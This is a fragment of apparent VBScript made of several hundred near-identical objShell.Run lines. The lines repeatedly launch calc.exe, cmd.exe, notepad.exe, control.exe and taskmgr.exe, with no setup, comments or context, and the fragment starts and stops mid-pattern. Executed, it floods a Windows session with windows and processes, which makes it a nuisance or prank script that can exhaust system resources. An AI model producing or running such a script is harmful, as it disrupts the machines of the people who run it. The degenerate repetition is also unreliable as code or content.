objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
